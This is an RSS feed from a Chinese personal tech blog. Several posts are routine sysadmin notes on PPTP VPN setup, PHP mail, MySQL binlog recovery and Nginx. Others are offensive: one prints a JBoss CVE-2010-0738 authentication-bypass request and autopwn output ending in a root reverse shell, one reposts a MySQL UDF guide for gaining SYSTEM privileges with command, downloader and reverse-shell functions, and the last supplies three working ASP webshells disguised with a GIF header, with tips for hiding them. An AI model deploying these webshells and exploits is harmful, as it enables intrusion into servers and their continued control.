<![CDATA[NetKnave 's BLog]]> http://www.netpk.org/blog/index.php zh-cn http://www.netpk.org/blog/read.php?530 <![CDATA[pptpd VPN服务器多公网IP实现拨入哪个出口为哪个]]> NetKnave <admin@yourname.com> Sat, 14 Aug 2010 09:17:58 +0000 http://www.netpk.org/blog/read.php?530
2.设置第一个公网IP
vi /etc/pptpd.conf

localip  192.168.20.1
remoteip 192.168.20.2-254
#在最后面添加一行 第一个公网ip
listen 98.0.0.90

添加NAT映射:
iptables  -t nat -A POSTROUTING -s 192.168.20.0/24 -j SNAT --to-source 98.0.0.90

3.设置第二个公网IP

cp /etc/pptpd.conf /etc/pptpd1.conf

vi /etc/pptpd1.conf

localip  192.168.21.1
remoteip 192.168.21.2-254
#在最后面添加一行 第一个公网ip
listen 98.0.0.91

添加NAT映射:
iptables  -t nat -A POSTROUTING -s 192.168.21.0/24 -j SNAT --to-source 98.0.0.91

4.重复3复制配置文件pptpd2.conf,pptpd3.conf.......pptpd[N].conf

5.启动方法:
#pptpd -c /etc/pptpd.conf 这个已经被作为系统服务了
pptpd -c /etc/pptpd1.conf
pptpd -c /etc/pptpd2.conf
pptpd -c /etc/pptpd3.conf
........

pptpd -c /etc/pptpd[N].conf


将以上命令放入初始启动文件中
linux 自动启动服务很简单,最简单的是把启动命令放到/etc/rc.d/rc.local文件里这样就可以每次启动的时候自动启动服务了
]]> http://www.netpk.org/blog/read.php?524 <![CDATA[JBoss 居然出这种漏洞 - CVE-2010-0738]]> NetKnave <admin@yourname.com> Fri, 28 May 2010 02:38:54 +0000 http://www.netpk.org/blog/read.php?524
刚休假回来,就看到JBOSS爆出的这个漏洞,不过redhat官方已经patch了。很奇怪国内没人关注?

在Redhat 的bugzilla上看到是3月16号报告的,4月27号订正

CVE-2010-0738 实际上讲的是一个JBoss 的认证绕过漏洞,分析和POC在这里:

Good Bye Critical Jboss 0day需要翻墙

简单来说,就是因为JBOSS在配置HTTP verbs的时候,访问控制的实现有问题,导致如 HEAD等未在配置文件中允许的verb能够直接以 jbossadmin 身份调用 GET handler, 从而绕过认证。

POC如下:

    HEAD /jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=6&arg0=..%2Fjmx-console.war%2F&arg1=ikki&arg2=.jsp&arg3=%3C%25%40+page+import%3D%22java.io.*….... HTTP/1.1

在Blackhat 2010 Europe 上发布的工具 jboss-autopwn,已经能够直接支持这个漏洞的调用了。

有人回帖给出了如下贴图:
[root@foo jboss-autopwn]# ./jboss-autopwn 192.168.1.3 8080
[x] Checking if authentication is enabled..
[!] Authentication enabled!
[x] Proceeding to use CVE-2010-0738 JBoss /jmx-console authentication bypass
[!] Is this a *nix based or Windows based JBoss instance? nix
[!] Which IP should I send the reverse shell to? 192.168.1.2
[!] Which port should I send the reverse shell to? 6669
[x] *nix based selected...
Connection from 192.168.1.3 port 6669 [tcp/*] accepted
[!] you should now have a shell on 192.168.1.2:6669
[root@foo jboss-autopwn]# fg 1
nc -lv 6669
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
uname -a
Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
^C
[root@foo jboss-autopwn]#

这个漏洞非常严重,因为是默认配置就存在的,受影响的版本建议自查一下。 ]]> http://www.netpk.org/blog/read.php?519 <![CDATA[CentOS 5 VPS上配置pptpd作为VPN服务器]]> NetKnave <admin@yourname.com> Wed, 31 Mar 2010 12:52:18 +0000 http://www.netpk.org/blog/read.php?519 pptpd VPN需要内核支持mppe,我们的VPS自带的内核已经把mppe编译进去了,没有把mppe另外当作内核的模块。

软件安装
要安装pptpd VPN,ppp和iptables这两个软件是必须安装的,安装命令:

yum install -y ppp iptables然后下载pptpd的rpm包:

32位 http://poptop.sourceforge.net/yum/stable/packages/pptpd-1.3.4-1.rhel5.1.i386.rpm
64位 http://poptop.sourceforge.net/yum/stable/packages/pptpd-1.3.4-1.rhel5.1.x86_64.rpm

要注意64位的系统要下载64位的rpm包,32位的系统要下载32位的rpm包,别搞错了

64位系统安装命令:

rpm -ivh pptpd*.x86_64.rpm

32位系统安装命令:

rpm -ivh pptpd*.i386.rpm编辑配置文件 /etc/ppp/options.pptpd 内容如下:

name pptpd
refuse-pap
refuse-chap
refuse-mschap
require-mschap-v2
require-mppe-128
proxyarp
lock
nobsdcomp
novj
novjccomp
nologfd
ms-dns 208.67.222.222
ms-dns 208.67.220.220
编辑配置文件 /etc/pptpd.conf 内容如下:

option /etc/ppp/options.pptpd
logwtmp
localip 192.168.92.1
remoteip 192.168.92.11-15编辑配置文件 /etc/ppp/chap-secrets,配置用户名为johndoe,密码为password,内容如下:

johndoe pptpd password *修改配置文件/etc/sysctl.conf中的相应内容如下:

net.ipv4.ip_forward = 1‘配置iptables:

iptables -t nat -A POSTROUTING -o eth0 -s 192.168.92.0/24 -j MASQUERADE
iptables -I FORWARD -p tcp --syn -i ppp+ -j TCPMSS --set-mss 1356
/etc/init.d/iptables save
/etc/init.d/iptables restart设置iptables和pptpd开机自动启动:

chkconfig pptpd on
chkconfig iptables on

然后运行reboot重新启动即可

PS:不重启的话连上了也上不了网,因为没有开启linux路由转发功能

使用sysctl -p命令使配置即时生效 然后就o了


]]> http://www.netpk.org/blog/read.php?516 <![CDATA[卸载360后系统服务加载出错]]> NetKnave <admin@yourname.com> Thu, 11 Feb 2010 01:49:50 +0000 http://www.netpk.org/blog/read.php?516 每次打开都让我生级360程序。晕查杀也查不出么名堂。真是蛋疼
卸了。。

卸载后重启,提示某个服务加载出错了,然后进系统之后暴卡。死机了。拔电源
再次重启之后到Event Viewer中看下错误日志
Event Type:  Error
Event Source:  Service Control Manager
Event Category:  None
Event ID:  7026
Date:    2010-02-11
Time:    9:13:34
User:    N/A
Computer:  MICROSOF-609F67
Description:
The following boot-start or system-start driver(s) failed to load:
Packet

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.


Packet?services中还看不到这个服务

解决办法,直接:sc delete Packet

重启搞定,恢复正常

真蛋疼 ]]> http://www.netpk.org/blog/read.php?505 <![CDATA[php 里的三种 sendmail_path 设置与发信方式]]> NetKnave <admin@yourname.com> Sat, 24 Oct 2009 08:46:42 +0000 http://www.netpk.org/blog/read.php?505 php.ini 里的 sendmail_path 默认设置是
sendmail_path = /usr/sbin/sendmail -t -i

一,如果之前有安装过其它Mail Server 的话,请清除干净。然后才接着下面的步骤
1.SendMail 方式 :安装好 Sendmail 以后就可以正常使用php的 mail() 发信了,不用怎么特意去设置它。

2.Exim 方式:
安装exim后,接着使用ln -s /usr/sbin/exim /usr/sbin/sendmai 文件连接指令。 php.ini 里面的 sendmail_path = /usr/sbin/sendmail -t -i 不用设置,就可以使用 mail() 发信了。

3.PostFix 方式:安装postfix完成后,修改 php.ini 里面的 sendmail_path ,将其设置为: sendmail_path = /usr/sbin/sendmail.postfix -t

二,启动你的 Mail Server.
1.SendMail 方式: /etc/rc.d/ini.d/sendmail start

2.Exim 方式: /etc/rc.d/ini.d/exim start

3.PostFix 方式: /etc/rc.d/ini.d/postfix start

三,重启你的 Apache
我的是:
/usr/local/apache2/bin/httpd -k restart

如果你是以 RPM 安装或者是FC系统默认安装的,路径是:
/etc/rc.d/ini.d/httpd -restart

Tags - , , ]]> http://www.netpk.org/blog/read.php?504 <![CDATA[linux mysql数据库恢复]]> NetKnave <admin@yourname.com> Tue, 20 Oct 2009 07:27:07 +0000 http://www.netpk.org/blog/read.php?504 打开phpmyadmin就顺手点了下用户。看到一个没用的账号就点删除。想删除这个用户
用户删除之后。跑去备份数据库。结果傻眼了。数据库没了。
刚才删用户的时候phpmyadmin下面的"Drop the databases that have the same names as the users. "打了个勾?
TM的。连同数据库一块删了。KAO啊。

找了很多办法,想在linux下恢复数据库的目录。问了很多人。都说无解。主机商也说没办法。我KAO。
无奈之下去看了下my.cnf 结果发现服务器上的二进制日志是开着的。上帝保佑啊

使用mysqlbinlog就可以恢复之前的误删操作了
首先还是在确保二进制日志是开启的

我的日志名设置为binlog.0000XX

先是使用mysqlbinlog将日志文件输出为文本格式来分析一下


/usr/local/web/mysql/bin/mysqlbinlog binlog.000011 > /tmp/11.txt
/usr/local/web/mysql/bin/mysqlbinlog binlog.000012 > /tmp/12.txt
/usr/local/web/mysql/bin/mysqlbinlog binlog.000013 > /tmp/13.txt


查看文本发现里面全是用户的操作记录

我在13.txt最底部找到了删除用户的记录

下面来恢复数据库先。首先导入前几个月的备份数据库。

然后慢慢恢复。先恢复前两个二进制日志


/usr/local/web/mysql/bin/mysqlbinlog binlog.000011 |/usr/local/web/mysql/bin/mysql -uroot -p
/usr/local/web/mysql/bin/mysqlbinlog binlog.000012 |/usr/local/web/mysql/bin/mysql -uroot -p


现在到第三个日志来了,也就是包含删除用户记录的日志

最尾部

# at 3649944
DROP USER 'database'@'localhost'

位置在 3649944    那就恢复第三个日志从开始至3649944的位置。后面的就不管了

/usr/local/web/mysql/bin/mysqlbinlog binlog.000013 --stop-pos=3649944 |/usr/local/web/mysql/bin/mysql -uroot -p


这样就KO了

假如在删除语句后面还有要恢复的  比如3649955行后的数据都要恢复   那就使用--start-pos=3649955

/usr/local/web/mysql/bin/mysqlbinlog binlog.000013 --start-pos=3649955 |/usr/local/web/mysql/bin/mysql -uroot -p



--stop-pos=600           //从日志头部至600位置结束
--start-pos=1111         //人日志1111的位置开始恢复

Tags - , , ]]> http://www.netpk.org/blog/read.php?503 <![CDATA[JavaScript连接数据库]]> NetKnave <admin@yourname.com> Sun, 11 Oct 2009 11:50:19 +0000 http://www.netpk.org/blog/read.php?503
代码:

<script language="javascript">  
var conn = new ActiveXObject("ADODB.Connection");
//var sqlstr="Provider=SQLOLEDB.1; Data Source=localhost; User ID=sa;Password=; Initial Catalog=pubs";
var sqlstr="Provider=SQLOLEDB;Data Source=localhost;UID=sa;PWD=;database=pubs";
conn.Open(sqlstr);
var rs = new ActiveXObject("ADODB.Recordset");
var sql="select * from authors";
rs.open(sql,conn);
shtml = "<table width=\'100%\' border=1>";    
shtml +="<tr bgcolor=\'#f4f4f4\'><td>au_id</td><td>au_lname</td><td>au_fname</td><td>phone</td><td>address</td><td>city</td><td>state</td><td>zip</td></tr>";    
while(!rs.EOF)    
{
shtml +="<tr><td>" + rs("au_id") + "</td><td>" + rs("au_lname") + "</td><td>" + rs("au_fname") + "</td><td>" + rs("phone") + "</td><td>" + rs("address") + "</td><td>" + rs("city") + "</td><td>" + rs("state") + "</td><td>" + rs("zip") + "</td></tr>";    
rs.moveNext;
}
shtml +=   "</table>";
document.write(shtml);
rs.close();
rs = null;
conn.close();
conn = null;
</script>


如果执行代码提示"safety settings on this computer prohibit accessing a data source on another domain"

在Internet options中把access data sources across domains设为Enable

Tags - , , ]]> http://www.netpk.org/blog/read.php?497 <![CDATA[Nginx 记录]]> NetKnave <admin@yourname.com> Sat, 05 Sep 2009 05:02:23 +0000 http://www.netpk.org/blog/read.php?497 不停止Nginx服务的情况下平滑变更Nginx配置

vi /usr/local/webserver/nginx/conf/nginx.conf

/usr/local/webserver/nginx/sbin/nginx -t

kill -HUP `cat /usr/local/webserver/nginx/nginx.pid`
Tags - ]]> http://www.netpk.org/blog/read.php?492 <![CDATA[将MYSQL读写权限转化为system权限]]> NetKnave <admin@yourname.com> Sun, 09 Aug 2009 16:15:58 +0000 http://www.netpk.org/blog/read.php?492 langouster_udf.php导入执行命令都OK。转之

--------------------------------哥不是分割线,是寂寞。-----------------------------------

文章作者:langouster
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

将MYSQL读写权限转化为system权限
一、功能:利用MYSQL的自定义函数功能(再次声明:利用MYSQL UDF提权绝非是溢出,而是MYSQL本身的一个功能),将MYSQL账号转化为系统system权限。
二、适用场合:1.目标系统是Windows(Win2000,XP,Win2003);2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。
三、使用帮助:
  第一步:将PHP文件上传到目标机上,填入你的MYSQL账号经行连接。
点击在新窗口中浏览此图片
  第二步:连接成功后,导出DLL文件,导出时请勿必注意导出路径(一般情况下对任何目录可写,无需考虑权限问题),对于 MYSQL5.0以上版本,你必须将DLL导出到目标机器的系统目录(win 或 system32),否则在下一步操作中你会看到"No paths allowed for shared library"错误。
点击在新窗口中浏览此图片
第三步:使用SQL语句创建功能函数。语法:Create Function 函数名(函数名只能为下面列表中的其中之一) returns string soname '导出的DLL路径';对于MYSQL5.0以上版本,语句中的DLL不允许带全路径,如果你在第二步中已将DLL导出到系统目录,那么你就可以省略路径而使命令正常执行,否则你将会看到"Can't open shared library"错误,这时你必须将DLL重新导出到系统目录。
点击在新窗口中浏览此图片
第四步:正确创建功能函数后,你就可以用SQL语句来使用这些功能了。语法:select 创建的函数名('参数列表'); 每个函数有不同的参数,你可以使用select 创建的函数名('help');来获得指定函数的参数列表信息。
点击在新窗口中浏览此图片

四、功能函数说明:
cmdshell 执行cmd;
  downloader 下载者,到网上下载指定文件并保存到指定目录;
  open3389 通用开3389终端服务,可指定端口(不改端口无需重启);
  backshell 反弹Shell;
  ProcessView 枚举系统进程;
  KillProcess 终止指定进程;
  regread 读注册表;
  regwrite 写注册表;
  shut 关机,注销,重启;
  about 说明与帮助函数;

点击这里下载文件 ]]> http://www.netpk.org/blog/read.php?491 <![CDATA[我的双功能免杀超强版asp小马]]> NetKnave <admin@yourname.com> Sat, 08 Aug 2009 19:31:44 +0000 http://www.netpk.org/blog/read.php?491 网上搜了一小马。成功。
小源码又到位了
---------------哥不是分割线,是寂寞。---------------------------
转自网络

第一款:


GIF89a$       ;<hTml>
<%eval request(chr(1))%>
<%
on error resume next
testfile=Request.form("filepath")
msg=Request.form("message")
if Trim(request("filepath"))<>"" then
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.CreateTextFile(testfile,True)
thisfile.Write(""&msg& "")
if err =0 Then
response.write "<font color=red>ok</font>"
else
response.write "<font color=red>no</font>"
end if
err.clear
thisfile.close
set fs = nothing
End if
%>
<form method="POST" ACTION="">
<input type="text" size="20" name="filepath"
value="<%=server.mappath("go.asp")%>"> <BR>
<TEXTAREA NAME="Message" ROWS="5" COLS="40"></TEXTAREA>
<input type="submit" name="Send" value="go">
</form></body></html></body></html>

第二款:

GIF89a$       ;<hTml>
<%eval request(chr(1))%>                
<% if request("action")="kof97" then %>
<%on error resume next%>
<%ofso="scripting.filesystemobject"%>
<%set fso=server.createobject(ofso)%>
<%path=request("path")%>
<%if path<>"" then%>
<%data=request("dama")%>
<%set dama=fso.createtextfile(path,true)%>
<%dama.write data%>
<%if err=0 then%>
<%="success"%>
<%else%>
<%="false"%>
<%end if%>
<%err.clear%>
<%end if%>
<%dama.close%>
<%set dama=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%=server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%=""%>
<%="<textarea name=dama cols=50 rows=10 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=save>"%>
<%="</form>"%>
<% end if %>
</body></html>


第三款:

<%set s=server.createObject("Adodb.Stream")%>
<%s.Type=2%>
<%s.Open%>
<%s.CharSet="gb2312"%>
<%s.writetext request("d")%>
<%s.SaveToFile server.mappath("go.asp"),2%>
<%s.Close%>
<%set s=nothing%>
<form>
<textarea name=d cols=80 rows=10 width=32></textarea>
<input type=submit>
</form>

使用说明及介绍:

第一款 功能说明: 用一句话连接进行传马 或直接传马

GIF89a$       ;<hTml>
--[这里的意思相信大家都了解 意思就是 上传图片时起到欺骗的作用.]

<%eval request(chr(1))%>
--[这是就asp一句话木马 这里的 chr(1) 就是asp一句话木马的密码

那么实际chr(1)= 所以密码为 别说你不知知道

重点来了 当你用这个ASP小马时 你可以用这个asp小马来里面的一句话进行传大马 然也可以直接用这个传大马


这里的go.asp就是上传马的地址了 这个自己可以修改   说的够详细吧

第二款:

同上功能就不说了!

<% if request("action")="kof97" then %>
相信懂ASP的一看就明白! 也不多说了

用法是 直接在你小马地址后面加上 ?action=kof97 给个例子吧

http://www.xxx.com/xxx.asp?action=kof97 kof97这个改成自己的!在小马里面改

好处就是 当别人直接访问你的小马时 显示的是空白 无法使用你的小马 与要密码的小马差不多

第三款:

可以说是除了ASP一句话小马之外就非它莫属了! 只有两百多个字节

<%s.SaveToFile server.mappath("go.asp"),2%>
当你打开小马地址就会自动生成go.asp 修改成自己的

此小马要与 一句话小马 或其它小马 配合使用 当你在在输入框写入我们的马 然后点 提交 会自动生成go.asp 小马地址

好处就是 当别人直接访问你的小马时 不管他提交什么马 他不知道你设置的那个文件地址 ]]>